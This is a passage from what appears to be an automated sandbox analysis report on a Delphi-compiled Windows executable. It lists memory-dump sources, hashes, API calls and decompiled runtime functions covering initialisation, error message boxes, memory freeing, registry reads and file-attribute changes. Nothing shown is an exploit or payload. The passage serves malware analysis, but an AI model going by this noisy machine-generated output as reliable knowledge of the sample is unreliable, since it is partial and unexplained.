                                                                                                                          0x0040647f
                                                                                                                          0x00406481
                                                                                                                          0x00406484
                                                                                                                          0x00000000
                                                                                                                          0x00406484
                                                                                                                          0x00406489
                                                                                                                          0x00406489
                                                                                                                          0x00406233
                                                                                                                          0x0040622d

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                                                                          • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                                                                                          • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                                                                          • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040FCB0, Relevance: 16.6, APIs: 11, Instructions: 119COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                                                                          • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                                                                                          • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                                                                          • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004100D0, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                                                                                          • CopyImage.USER32 ref: 0041040F
                                                                                                                          • CopyImage.USER32 ref: 00410496
                                                                                                                          • CopyImage.USER32 ref: 004101EA
                                                                                                                            • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                                                                                            • Part of subcall function 0040FBEC: 73BBAC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                                                                                            • Part of subcall function 0040FBEC: 73BBA7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                                                                                            • Part of subcall function 0040FBEC: 73BBB380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                                                                                          • CopyImage.USER32 ref: 0041052B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CopyImage$B380
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1117845954-3887548279
                                                                                                                          • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                                                                          • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                                                                                          • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                                                                          • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00410C68, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                                                                                            • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                                                                                            • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                                                                                            • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                                                                                            • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                                                                          • API String ID: 997383822-4093836345
                                                                                                                          • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                                                                          • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                                                                                          • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                                                                          • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040D815, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32 ref: 0040C2A5
                                                                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32 ref: 0040C2B1
                                                                                                                          • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                                                                                          • GetVersion.KERNEL32 ref: 0040D88F
                                                                                                                          • GetVersion.KERNEL32 ref: 0040D8A0
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                                                                                            • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                                                                            • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                                                                            • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                                                                                            • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                          • String ID: 8$S
                                                                                                                          • API String ID: 3734044017-3602091218
                                                                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403D7D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
				 *0x40900c = 2;
				 *0x40a010 = 0x401008;
				 *0x40a014 = 0x401010;
				 *0x40a036 = 2;
				 *0x40a000 = E00403960;
				if(E00402808() != 0) {
					_t3 = E00402838();
				}
				E004028FC(_t3);
				 *0x40a03c = 0xd7b0;
				 *0x40a208 = 0xd7b0;
				 *0x40a3d4 = 0xd7b0;
				 *0x40a02c = GetCommandLineA();
				 *0x40a028 = E00401098();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x40a5a8 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x40a020 = _t11;
				return _t11;
			}





                                                                                                                          0x00403d7d
                                                                                                                          0x00403d82
                                                                                                                          0x00403d87
                                                                                                                          0x00403d89
                                                                                                                          0x00403d90
                                                                                                                          0x00403d9a
                                                                                                                          0x00403da4
                                                                                                                          0x00403dab
                                                                                                                          0x00403dbc
                                                                                                                          0x00403dbe
                                                                                                                          0x00403dbe
                                                                                                                          0x00403dc3
                                                                                                                          0x00403dc8
                                                                                                                          0x00403dd1
                                                                                                                          0x00403dda
                                                                                                                          0x00403de8
                                                                                                                          0x00403df2
                                                                                                                          0x00403e06
                                                                                                                          0x00403e3f
                                                                                                                          0x00403e08
                                                                                                                          0x00403e16
                                                                                                                          0x00403e2e
                                                                                                                          0x00403e18
                                                                                                                          0x00403e18
                                                                                                                          0x00403e18
                                                                                                                          0x00403e16
                                                                                                                          0x00403e44
                                                                                                                          0x00403e49
                                                                                                                          0x00403e4e

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32 ref: 0040280D
                                                                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32 ref: 00402819
                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                                                                                          • GetVersion.KERNEL32 ref: 00403DF7
                                                                                                                          • GetVersion.KERNEL32 ref: 00403E08
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                                                                                            • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                                                                            • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                                                                            • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                                                                          • GetThreadLocale.KERNEL32 ref: 00403E24
                                                                                                                            • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                          • String ID: 8$S
                                                                                                                          • API String ID: 3734044017-3602091218
                                                                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
                                                                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                                                                          • Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040C9B0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                                                                                          • MessageBoxA.USER32 ref: 0040CA28
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                          • Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                                                                          • Instruction ID: e346e235dea6380484e37d32cf1e26acb754014f59db45d581b47c6c48365cc5
                                                                                                                          • Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                                                                          • Instruction Fuzzy Hash: 58F0CDA0BC430878E620E3A4AE0AF5A221C4348B15F60463FB220741D3C6BC4894C72F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402F18, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402F18(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x40a034 == 0) {
					if( *0x409024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
						 *0x40a220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
				}
			}





                                                                                                                          0x00402f20
                                                                                                                          0x00402f80
                                                                                                                          0x00402f90
                                                                                                                          0x00402f90
                                                                                                                          0x00402f96
                                                                                                                          0x00402f22
                                                                                                                          0x00402f2b
                                                                                                                          0x00402f3b
                                                                                                                          0x00402f3b
                                                                                                                          0x00402f57
                                                                                                                          0x00402f78
                                                                                                                          0x00402f78

                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                                                                                          • MessageBoxA.USER32 ref: 00402F90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                          • Opcode ID: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                                                                          • Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
                                                                                                                          • Opcode Fuzzy Hash: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                                                                          • Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040184C, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E0040184C() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x40a5ac == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401922);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010E4();
					}
					 *0x40a5ac = 0;
					_t3 =  *0x40a60c; // 0x0
					LocalFree(_t3);
					 *0x40a60c = 0;
					_t19 =  *0x40a5d4; // 0x40a5d4
					while(_t19 != 0x40a5d4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E0040114C(0x40a5d4);
					E0040114C(0x40a5e4);
					E0040114C(0x40a610);
					_t14 =  *0x40a5cc; // 0x0
					while(_t14 != 0) {
						 *0x40a5cc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x40a5cc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401929);
					if( *0x40a035 != 0) {
						_push(0x40a5b4);
						L004010EC();
					}
					_push(0x40a5b4);
					L004010F4();
					return 0;
				}
			}










                                                                                                                          0x0040184d
                                                                                                                          0x00401857
                                                                                                                          0x0040192b
                                                                                                                          0x0040185d
                                                                                                                          0x0040185f
                                                                                                                          0x00401860
                                                                                                                          0x00401865
                                                                                                                          0x00401868
                                                                                                                          0x00401872
                                                                                                                          0x00401874
                                                                                                                          0x00401879
                                                                                                                          0x00401879
                                                                                                                          0x0040187e
                                                                                                                          0x00401885
                                                                                                                          0x0040188b
                                                                                                                          0x00401892
                                                                                                                          0x00401897
                                                                                                                          0x004018b1
                                                                                                                          0x004018a6
                                                                                                                          0x004018aa
                                                                                                                          0x004018af
                                                                                                                          0x004018af
                                                                                                                          0x004018be
                                                                                                                          0x004018c8
                                                                                                                          0x004018d2
                                                                                                                          0x004018d7
                                                                                                                          0x004018de
                                                                                                                          0x004018e2
                                                                                                                          0x004018e9
                                                                                                                          0x004018ee
                                                                                                                          0x004018f3
                                                                                                                          0x004018f9
                                                                                                                          0x004018fc
                                                                                                                          0x004018ff
                                                                                                                          0x0040190b
                                                                                                                          0x0040190d
                                                                                                                          0x00401912
                                                                                                                          0x00401912
                                                                                                                          0x00401917
                                                                                                                          0x0040191c
                                                                                                                          0x00401921
                                                                                                                          0x00401921

                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00401922), ref: 0040188B
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401922), ref: 004018AA
                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401922), ref: 004018E9
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 00401912
                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 0040191C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3782394904-0
                                                                                                                          • Opcode ID: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                                                                          • Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
                                                                                                                          • Opcode Fuzzy Hash: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                                                                          • Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040B2E4, Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00401922), ref: 0040B323
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401922), ref: 0040B342
                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401922), ref: 0040B381
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 0040B3AA
                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00000000,00000000,00401922), ref: 0040B3B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3782394904-0
                                                                                                                          • Opcode ID: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                                                                          • Instruction ID: 308c92a7e2b5e7ecfd07cead530b628894948fc1d130f20f37bfe88cfaf8842a
                                                                                                                          • Opcode Fuzzy Hash: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                                                                          • Instruction Fuzzy Hash: 89115EB06043406ED711EB669D41B167BB9F745708F24843BE944B62E2C77DA870CB6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402838, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 65%
                                                                                                                          			E00402838() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x409018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x409018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x409018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E004028A9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x4028b0);
					return RegCloseKey(_v8);
				}
			}












                                                                                                                          0x00402839
                                                                                                                          0x0040283b
                                                                                                                          0x00402845
                                                                                                                          0x00402861
                                                                                                                          0x004028b0
                                                                                                                          0x004028c2
                                                                                                                          0x004028c5
                                                                                                                          0x004028ce
                                                                                                                          0x00402863
                                                                                                                          0x00402865
                                                                                                                          0x00402866
                                                                                                                          0x0040286b
                                                                                                                          0x0040286e
                                                                                                                          0x00402871
                                                                                                                          0x0040288d
                                                                                                                          0x00402894
                                                                                                                          0x00402897
                                                                                                                          0x0040289a
                                                                                                                          0x004028a8
                                                                                                                          0x004028a8

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
